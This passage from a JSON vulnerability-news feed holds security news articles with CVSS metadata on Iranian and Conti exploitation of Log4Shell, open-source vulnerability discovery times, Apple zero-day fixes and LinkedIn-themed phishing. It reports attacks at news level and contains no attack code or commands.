tail](<https://thehackernews.com/2022/06/log4shell-still-being-exploited-to-hack.html>) for remediation.\n\nMicrosoft attributed the latest set of activities to the [umbrella threat group](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>) tracked as [MuddyWater](<https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html>) (aka Cobalt Ulster, Mercury, Seedworm, or Static Kitten), which is [linked](<https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html>) to the Iranian intelligence apparatus, the Ministry of Intelligence and Security (MOIS).\n\nThe attacks are notable for using SysAid Server instances unsecured against the [Log4Shell flaw](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) as a vector for initial access, [marking](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>) a [departure](<https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html>) from the actors' pattern of leveraging VMware applications for breaching target environments.\n\n\"After gaining access, Mercury establishes persistence, dumps credentials, and moves laterally within the targeted organization using both custom and well-known hacking tools, as well as built-in operating system tools for its hands-on-keyboard attack,\" Microsoft [said](<https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiEY8bFJzA4Vo5E-51T317ysyhNyuELdzWBrMSX0bVcuH0-GwT3rvx98GwUWcYT6uGEZsyl_oC06QFM8jtx_FRCeULg_F5SSrExXHoNNFOqAIcrwmlEf9SHHuVZLnyUBfyTuRX-kSSlrbHLwTncuNKGZSy1TrvW9WDeVw6L8G-Hb_BRt_OO6ebaepJ-/s728-e100/ms.jpg>)\n\nThe tech giant's threat intelligence team said it observed the attacks between July 23 and 25, 2022.\n\nA successful compromise is said to have been followed by the deployment of web shells to execute commands that permit the actor to conduct reconnaissance, establish persistence, steal credentials, and facilitate lateral movement.\n\nAlso employed for command-and-control (C2) communication during intrusions is a remote monitoring and management software called [eHorus](<https://ehorus.com/>) and Ligolo, a [reverse-tunneling tool](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>) of choice for the adversary.\n\nThe findings come as the U.S. Department of Homeland Security's Cyber Safety Review Board (CSRB) [deemed](<https://www.dhs.gov/news/2022/07/14/cyber-safety-review-board-releases-report-its-review-log4j-vulnerabilities-and>) the critical vulnerability in the open-source Java-based logging framework an endemic weakness that will continue to plague organizations for years to come as exploitation evolves.\n\nLog4j's [wide usage](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) across many suppliers' software and services means sophisticated adversaries like nation-state actors and commodity operators alike have opportunistically taken advantage of the vulnerability to mount a smorgasbord of attacks.\n\nThe Log4Shell attacks also follow a recent report from Mandiant that detailed an espionage campaign aimed at Israeli shipping, government, energy, and healthcare organizations by a likely Iranian hacking group dubbed [UNC3890](<https://thehackernews.com/2022/08/suspected-iranian-hackers-targeted.html>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-27T03:23:00", "type": "thn", "title": "Iranian Hackers Exploiting Unpatched Log4j 2 Bugs to Target Israeli Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-27T03:23:28", "id": "THN:DF2B6840863D6847D7088B1A07B19A4A", "href": "https://thehackernews.com/2022/08/iranian-hackers-exploiting-unpatched.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-01T12:06:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhHCMnqhwqPtQNSBXsZfmX7LEVj5u6v9J0m0PEJfwCxouhiIhao2Vs5MVncWuJ98NuxpWT7NguZoYl9dp9C4CsQNISQjl1ik3-HeBH_0aR7VPGsot16xib61mh4OHw6O8pbWPihBxdOnhJUpQ7H8hm9OS6DpuBY_aUAr7qYoai0rNSCjr6TtjWFr_JO/s728-e100/open-source-hacking.jpg>)\n\nLinus Torvalds, the creator of Linux and Git, has his own law in software development, and it goes like this: \"_given enough eyeballs, all bugs are shallow_.\" This phrase puts the finger on the very principle of open source: the more, the merrier - if the code is easily available for anyone and everyone to fix bugs, it's pretty safe. But is it? Or is the saying \"all bugs are shallow\" only true for _shallow_ bugs and not ones that lie deeper? It turns out that security flaws in open source can be harder to find than we thought. Emil W\u00e5reus, Head of R&amp;D at [Debricked](<https://debricked.com>), took it upon himself to look deeper into the community's performance. As the data scientist he is, he, of course, asked the data: _how good is the open source community at finding vulnerabilities in a timely manner_?\n\n## **The thrill of the (vulnerability) hunt**\n\nFinding open source vulnerabilities is typically done by the maintainers of the open source project, users, auditors, or external security researchers. But despite these great code-archaeologists helping secure our world, the community still struggles to find security flaws. \n\nOn average, it takes _over 800 days_ to discover a security flaw in open source projects. For instance, the infamous Log4shell (CVE-2021-44228) vulnerability was undiscovered for a whopping 2649 days. \n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiDV6UV2i1t5HF7EMQs8N5wywO9YTWCb3M_uB1ZqwVnkPDzieuVEda7tkHRQiw41mhCnz3SBVnaReHEMH2fUQNCCC_Z4S-6KYh_KH5nY-f0od8kkYPj9BWh2JjUSdnMcPRqovKz6tSxPy6tCA2_5c-bO52_9kby2Ci3hqk0g9VcmKTnSJUmn4KFxJgW/s728-e100/FLAWS.jpg>)\n\nThe analysis shows that 74% of security flaws are actually undiscovered for at least one year! Java and Ruby seem to have the most challenges here, as it takes the community more than 1000 days to find and disclose vulnerabilities. Our [white] hats go off to the PHP/Composer community, which slightly outperforms the others. \n\n## **The needle in a techstack**\n\nOther interesting factors are that some of the different weakness types (CWE) seem to be harder to find and disclose, which actually contradicts Linus's law. The weakness types CWE-400 (Uncontrolled Resource Consumption) and CWE-502 (Deserialization of Untrusted Data) typically aren't localized to a single function or may appear as intended logic in the application. In other words, it can't be considered \"a shallow bug.\" \n\nIt also seems that the developer community is a bit better at finding CWE-20 (Improper Input Validation), where the flaw most of the time is just a few lines of code in a single function. \n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjMcHcgVAMCZdOLqkgBI2vwxfxloDUpyM00TN6hWNXm2XuP6xMEA6rxvm6SSzpLbxnWheflWn2NzzpG28KssHYhTkxqvgPCreYfJUptqQ466Jvgjav1oC_3pRbCDqLGVNtbUmUGhmdO_mv8yRBolaXWeQr91wJXBpvD3XjYa4h945ZbgYI8puChOJYh/s728-e100/bugs.jpg>)\n\n## **Solve vulnerabilities with powerful remediation **\n\nWhy does this matter? As consumers of open source, and that's about every company in the whole world, the problem of vulnerabilities in open source is an important one. The data tells us that we can't fully trust Linus' Law - not because open source is less secure than other software, but because **not all bugs are shallow**.\n\nLuckily, there are powerful tools to perform at-scale analysis of a lot of open source projects at once. There have been [[white knight hackers disclose 1000's](<https://www.youtube.com/watch?v=WkdzWiNKzt8>)] of vulnerabilities at once using these methods. It would be naive to not assume that ill-minded organizations and individuals do the same. As an ecosystem that lays the foundation for our software-centric world, the community must improve its ability to find, disclose, and fix security flaws in open source significantly. \n\nLast year, [Google committed $10 billion](<https://blog.google/technology/safety-security/why-were-committing-10-billion-to-advance-cybersecurity/>) to an open source fund to help secure open source with a specific curator role to work alongside the maintainers with specific security efforts. \n\nFurthermore, Debricked helps companies make these vulnerabilities actionable by scanning all your software, every branch, every push, and every commit, for new (open source) vulnerabilities. Debricked even continuously scans all your old commits for every new vulnerability, to make sure they bring up-to-date, accurate, and actionable intelligence on the open source you consume. Debricked even helps developers fix your security flaws with automated pull requests that won't cause dependency hell; pretty neat! \n\n## The truth lies in the data\n\nSo, knowing all this, what is the best way to protect your project or company against open source vulnerabilities? As we've seen in the case of Log4j and Spring4shell as well as the numbers, we can never really trust that the community will find and fix all risks. There's a good chance that there are lots and lots of undiscovered and undisclosed vulnerabilities in your code today, and there's not much you can do about it. \n\nAccording to Debricked, the best way to mitigate this is by implementing continuous vulnerability scanning to your SDLC. By automatically scanning at every push of code, in combination with the machine learning-powered [vulnerability database](<https://debricked.com/vulnerability-database>). This makes sure you're updated in real-time, you'll know about new vulnerabilities before anyone else does. As soon as there's a fix, you can generate a [Fix Pull Request](<https://debricked.com/blog/debricked-launching-automatic-fix-pull-request/>) automatically or solve it manually with Debricked's help. _Currently, Debricked offers remediation for JavaScript and Go, with more language support is to come shortly. _\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-01T12:04:00", "type": "thn", "title": "Last Years Open Source - Tomorrow's Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-01T12:04:08", "id": "THN:161777F5DB73EF3AB5B13EF9F11E3374", "href": "https://thehackernews.com/2022/11/last-years-open-source-tomorrows.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-01-26T23:19:30", "description": "Apple on Wednesday released 13 patches for serious security bugs in [macOS ](<https://support.apple.com/en-us/HT213054>)and 10 for flaws in [iOS/iPadOS.](<https://support.apple.com/en-us/HT213053>) They include fixes for two zero-day bugs, one of which may have been exploited by attackers in the wild.\n\nThe first zero-day (CVE-2022-22587) is a memory-corruption issue that could be exploited by a malicious app to execute arbitrary code with kernel privileges. The bug specifically exists in the IOMobileFrameBuffer \u2013 a kernel extension that allows developers to control how a device\u2019s memory handles the screen display, aka a framebuffer. It affects iOS, iPadOS and macOS Monterey, and Apple [addressed](<https://support.apple.com/en-us/HT213054>) it with improved input validation.\n\nApple also said it\u2019s aware of a report that indicates it may have been actively exploited in the wild.\n\nThe update is available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\n## Data-Exposing Apple Safari Bug Squashed\n\nAlso out is a fix for a second zero day: a widely published WebKit flaw in the pervasive Safari browser that\u2019s tracked as CVE-2022-22594. The information-disclosure issue affects browsers for macOS, iOS and iPadOS. [Disclosed by FingerprintJS researchers last week,](<https://threatpost.com/apple-safari-bug-browsing-data-google-ids/177809/>) it allows a snooping website to find out information about other tabs a user might have open.\n\nThat bug is a cross-origin policy violation in the IndexDB API \u2013 a JavaScript API provided by web browsers to manage a NoSQL database of JSON objects \u2013that Apple also addressed with improved input validation.\n\nTypically, a web browser permits scripts on one web page to access data on a second web page only if both pages have the same origin/back-end server. Without this security policy in place, a snooper who manages to inject a malicious script into one website would be able to have free access to any data contained in other tabs the victim may have open in the browser, including access to online banking sessions, emails, healthcare portal data and other sensitive information.\n\nJohn Bambenek, principal threat hunter for Netenrich, told Threatpost on Wednesday that zero-days like these two \u2013 ones that can allow remote-code execution (RCE) on mobile devices \u2013 are \u201camong the most dangerous there are.\u201d\n\nThink mobile spyware, think [Pegasus](<https://threatpost.com/pegasus-spyware-state-department-iphones/176779/>), think nation-state espionage.\n\n\u201cOften, these types of bugs are used \u2026 with significant ill intent or by governments engaged in human-rights abuses,\u201d Bambenek said via email. \u201cUnfortunately, we will likely see more of these bugs as the year goes on.\u201d\n\nThe patches are available in the macOS Monterey 12.2 and the iOS/iPadOS 15.3 updates. iOS 15.3 also brought fixes for security issues that could lead to apps gaining root privileges, the ability to execute arbitrary code with kernel privileges, and the ability for apps to get at user files through iCloud.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2022-01-26T22:19:57", "type": "threatpost", "title": "Apple Fixes 2 Zero-Day Security Bugs, One Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594"], "modified": "2022-01-26T22:19:57", "id": "THREATPOST:B8BEEE8F3BDF1B6AD88639DA8C4595EA", "href": "https://threatpost.com/apple-zero-day-security-exploited/178040/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-21T18:13:55", "description": "The Conti ransomware gang, which last week became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability, has now built up a holistic attack chain.\n\nThe sophisticated Russia-based Conti group \u2013 which Palo Alto Networks [has called](<https://unit42.paloaltonetworks.com/conti-ransomware-gang/>) \u201cone of the most ruthless\u201d of dozens of ransomware groups currently known to be active \u2013 was in the right place at the right time with the right tools when [Log4Shell hit the scene](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) shared with Threatpost on Thursday.\n\nAs of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel\u2019s Yelisey Boguslavskiy told Threatpost: Emotet -&gt; Cobalt Strike -&gt; Human Exploitation -&gt; (no ADMIN$ share) -&gt; Kerberoast -&gt; vCenter ESXi with log4shell scan for vCenter.\n\n## Attack Chain\n\nStepping through that attack chain:\n\n 1. **Emotet** is a botnet that resurfaced last month on the back of TrickBot, now with the ability to directly install \u2026\n 2. [**Cobalt Strike**](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), the legitimate, commercially available tool used by network penetration testers on infected devices and pervasively adopted by cybercriminals. It gives threat actors direct access to targets and, according to Boguslavskiy, precedes\u2026\n 3. **Human Exploitation**, which describes the stage of an attack in which threat actors personally investigate the network, looking for critical data, analyzing the network structure, defining the most important network shares, and looking at ways to elevate privileges, among other things. That poking around is followed by \u2026\n 4. **Missing ADMIN$ share. **Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. As [Microsoft](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/problems-administrative-shares-missing>) puts it, \u201cMissing administrative shares typically indicate that the computer in question has been compromised by malicious software.\u201d Next up comes \u2026\n 5. **Kerberoast. **Kerberoasting, a common, pervasive attack that exploits a combination of weak encryption and poor service account password hygiene, is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. With regards to the final link in the attack chain, the Conti gang last week zeroed in on \u2026\n 6. **VMWare vCenter servers.** As of Wednesday, Dec. 15, Conti was looking for vulnerable VMWare networks for initial access and lateral movement. The VMWare servers are on a dismayingly [long list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of affected components and vendors whose products have been found to be vulnerable to Log4Shell.\n\nWithin two days of the public disclosure of the vulnerability in Apache\u2019s Log4j logging library on Dec. 10 \u2013 a bug that came under attack within hours \u2013 Conti group members were discussing how to exploit it as an initial attack vector, according to AdvIntel.\n\nApache patched the bug on Dec. 11, but its patch, Log4J2, [was found to be incomplete](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) in certain non-default configurations and paved the way for denial-of-service (DoS) attacks in certain scenarios.\n\nAs if two bugs aren\u2019t enough, yet another, similar but distinct bug was [discovered](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>) last week in the Log4J logging library. Apache issued a patch on Friday.\n\n## Conti Winds Up Its Exploit Machine\n\nAccording to the Thursday AdvIntel writeup, from Vitali Kremez and Yelisey Boguslavskiy, multiple Conti group members on Dec. 12 began to chat about exploiting the Log4Shell vulnerability as an initial attack vector. That led to scanning for vulnerable systems that AdvIntel first tracked the next day, on Dec. 13.\n\n\u201cThis is the first time this vulnerability entered the radar of a major ransomware group,\u201d according to the writeup. The emphasis is on \u201cmajor,\u201d given that the first ransomware group to target Log4Shell was a ransomware newcomer named[ Khonsari](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). As Microsoft has [reported](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#Minecraft>), Khonsari was locking up Minecraft players via unofficial servers. First spotted by [Bitdefender](<https://www.bleepingcomputer.com/news/security/new-ransomware-now-being-deployed-in-log4shell-attacks/>) in Log4Shell attacks, the ransomware\u2019s demand note[ lacked a way to contact](<https://www.bleepingcomputer.com/news/security/microsoft-khonsari-ransomware-hits-self-hosted-minecraft-servers/>) the operators to pay a ransom. That means that Khonsari is more of a wiper, meant to troll Minecraft users by taking down their servers, rather than ransomware.\n\nKhonsari ransomware was just one malware that\u2019s been thrown at vulnerable servers over the course of the Log4j saga. Within hours of public disclosure of the flaw, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing quickly evolving attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT). reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\n## A Perfect Storm\n\nLog4Shell has become a focal point for threat actors, including suspected nation state actors who\u2019ve been observed investigating Log4j2, AdvIntel researchers noted. The compressed timeline of the public disclosure followed fast by threat actor interest and exploits exemplifies the accelerated trajectory of threats witnessed since the [ProxLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) family of bugs in Exchange Server in March and the subsequent attacks, they said: \u201cif one day a major CVE is spotted by APTs, the next week it is weaponized by ransomware,\u201d according to their writeup.\n\nBut out of all the threat actors, Conti \u201cplays a special role in today\u2019s threat landscape, primarily due to its scale,\u201d they explained. It\u2019s a highly sophisticated organization, comprising several teams. AdvIntel estimates that, based on scrutiny of Conti\u2019s logs, the Russian-speaking gang made over $150 million over the past six months.\n\nBut still they continue to expand, with Conti continually looking for new attack surfaces and methods.\n\nAdvIntel listed a number of Conti\u2019s innovations since August, including:\n\n * [Secret backdoors](<https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent>): Conti\u2019s Atera Agent allows the gang to gain persistence on infected protected environments: especially those equipped with more aggressive machine learning endpoint detention and response anti-virus productions. \u201cThe IT management solution enables monitoring, management and automation of hundreds of SMB IT networks from a single console,\u201d AdvIntel described in an August report.\n * New[ backup removal](<https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love>) solutions that expanded Conti\u2019s ability to [blow up backups](<https://threatpost.com/conti-ransomware-backups/175114/>).\n * An entire operation to revive[ Emotet](<https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware>), which [resurfaced](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) in November.\n\nThe writeup shared a timeline of Conti\u2019s search for new attack vectors, shown below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/20163220/conti_timeline-e1640035956574.jpg>)\n\nTimeline of Conti\u2019s search for new attack vectors. Source: AdvIntel.\n\n## Keeping Your Head Above the Logjam\u2019s Water\n\nAdvIntel shared these suggested recommendations and mitigations for Log4Shell:\n\n * The Dutch National Cyber Security Center shared a list of the affected software and recommendations linked to each one of them [on GitHub](<https://github.com/NCSC-NL/log4shell/tree/main/software>).\n * Here are [VMWare\u2019s workaround instructions](<https://kb.vmware.com/s/article/87081>) to address CVE-2021-44228 in vCenter Server and vCenter Cloud Gateway (87081).\n\n## When Will It All End?\n\nLou Steinberg, former chief technology officer at TD Ameritrade, said it ain\u2019t over til it\u2019s over, \u201cAnd it\u2019s not over.\u201d\n\n\u201cWe don\u2019t know if we patched systems after they were compromised from Log4J, so it may be a while before we know how bad things are,\u201d he said in an article shared with Threatpost on Monday. \u201cThis will happen again. Modern software and systems are built from components which aren\u2019t always trustworthy. Worse, bad actors know this and look to subvert the components to create a way into otherwise trusted software.\u201d\n\n122121 10:25 Added more attack chain details provided by AdvIntel.\n\n122121 13:00 Removed brute-force from the attack chain, given that, as AdvIntel explained, the brute-forcing of encrypted hashes carried out in these attacks is a different kind of brute-forcing than the typical definition of trying numerous credentials.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T22:11:30", "type": "threatpost", "title": "Conti Ransomware Gang Has Full Log4Shell Attack Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T22:11:30", "id": "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "href": "https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T22:17:40", "description": "Emotionally vulnerable and willing to offer up any information that lands the gig, job seekers are prime targets for social engineering campaigns. And with the \u201cGreat Resignation\u201d in full swing, cybercriminals are having an easy time finding their next victim.\n\nJust since Feb. 1, analysts have watched [phishing email attacks impersonating LinkedIn](<https://www.egress.com/resources/cybersecurity-information/phishing/linkedin-phishing-attacks>) surge 232 percent, attempting to trick job seekers into giving up their credentials.\n\n\u201cCurrent employment trends help to make this attack more convincing,\u201d a new report from Egress said. \u201c\u2018The Great Resignation\u2019 continues to dominate headlines, and a record number of Americans left their jobs in 2021 for new opportunities. It is likely these phishing attacks aim to capitalize on jobseekers (plus curious individuals) by flattering them into believing their profile is being viewed and their experience is relevant to household brands.\u201d\n\nThe emails had subject lines that would be enticing to job hunters hoping to get noticed, like, \u201cWho\u2019s searching for you online,\u201d \u201cYou appeared in 4 searches this week\u201d or even \u201cYou have 1 new message,\u201d the Egress team said.\n\nThe [phishing emails](<https://threatpost.com/squirrelwaffle-fraud-exchange-server-malspamming/178434/>) themselves were convincing dupes, built in HTML templates with the LinkedIn logo, colors and icons, the report added. The scammers also name-checked well-known companies throughout the bodies of the phishing emails, including American Express and CVS Carepoint, to make the correspondence seem more legitimate, the analysts said.\n\nEven the email\u2019s footer lifted the company\u2019s headquarters\u2019 address and included \u201cunsubscribe\u201d links to add to the email\u2019s authenticity, the analysts pointed out.\n\n\u201cYou can also see the LinkedIn display name spoofing, which is designed to hide the webmail accounts used to launch the attacks,\u201d the report said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/16154716/linkedin-phsihing-email.png>)\n\nLinkedIn phishing email. Source: Egress.\n\nOnce the victim clicks on the malicious links in the email, they were directed to a site to harvest their LinkedIn logins and passwords.\n\n\u201cWhile the display name is always LinkedIn and the emails all follow a similar pattern, the phishing attacks are sent from different webmail addresses that have zero correlation with each other,\u201d the analysts added. \u201cCurrently, it is unknown whether these attacks are the work of one cybercriminal or a gang operating together.\u201d\n\n021722 09:18 UPDATE: LinkedIn sent the following statement to Threatpost:\n\n\u201cOur internal teams work to take action against those who attempt to harm LinkedIn members through phishing. We encourage members to report suspicious messages and help them learn more about what they can do to protect themselves, including turning on [two-step verification](<https://www.linkedin.com/help/linkedin/answer/544/turn-two-step-verification-on-and-off?lang=en>). To learn more about how members can identify phishing messages, see our Help Center [here](<https://www.linkedin.com/help/linkedin/answer/5342/phishing-emails?lang=en>).\u201d\n\n## **Data Scraping Attacks on Job Seekers **\n\nBesides using potential job leads to trick targets into coughing up their credentials, Imperva, in a separate report, detailed how it stopped the [largest bot attack](<https://www.imperva.com/blog/imperva-mitigates-massive-bot-attack-of-400-million-requests/>) the company has seen to date, on a global job listing site.\n\nImperva didn\u2019t specifically name the company, but the company said that it was bombarded with 400 million bot requests over 400,000 unique IP addresses over four days that tried to scrape all its job seekers\u2019 data.\n\nThe Imperva team added that these types of web-scraping attacks are common and can result in \u201clower conversion rates, skewed marketing analytics, decrease in SEO ranking, website latency, and even downtime (usually caused by aggressive scrapers).\u201d\n\nBut as Imperva pointed out in its report, data scraping is one of those cybersecurity gray areas. Collecting publicly available information isn\u2019t itself a data breach, but collected in mass quantities, it can be a weapon wielded against users in social-engineering attacks.\n\nLast summer, a massive [data-scraping attack against LinkedIn](<https://threatpost.com/linkedin-data-scrape-victims-targeted-attackers/167473/>) was discovered to have collected at least 1.2 billion user records that were later sold on underground forums. At the time, LinkedIn reiterated that the [scraped data was public information](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>), not private information, and didn\u2019t qualify as a breach.\n\nLinkedIn isn\u2019t really at fault here, according to Yehuda Rosen, senior software engineer at nVisium.\n\n\u201cThis has little to do with LinkedIn specifically \u2013 they\u2019re not doing anything wrong here,\u201d Rosen explained to Threatpost. \u201cIt boils down to the fact that LinkedIn has hundreds of millions of members \u2013 many of whom are very accustomed to seeing frequent legitimate emails from LinkedIn \u2013 and may inevitably click without carefully checking that each and every email is the real deal.\u201d\n\nThat leaves it to individual users to be mindful of the information they expose publicly and how it could be used to trick them into clicking on a malicious link.\n\n\u201cWhile I don\u2019t believe that this will hurt LinkedIn\u2019s brand, this does reiterate the importance of email phishing education,\u201d Ray Kelly, with NTT Application Security, told Threatpost by email. \u201cGiven these emails are coming from a legit LinkedIn email address makes it especially difficult to identify the danger. My rule is to never click on email links. Always visit the site directly.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a _**[**_LIVE roundtable discussion_**](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. _**[**_REGISTER NOW_**](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T21:15:47", "type": "threatpost", "title": "Massive LinkedIn Phishing, Bot Attacks Feed on the Job-Hungry", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 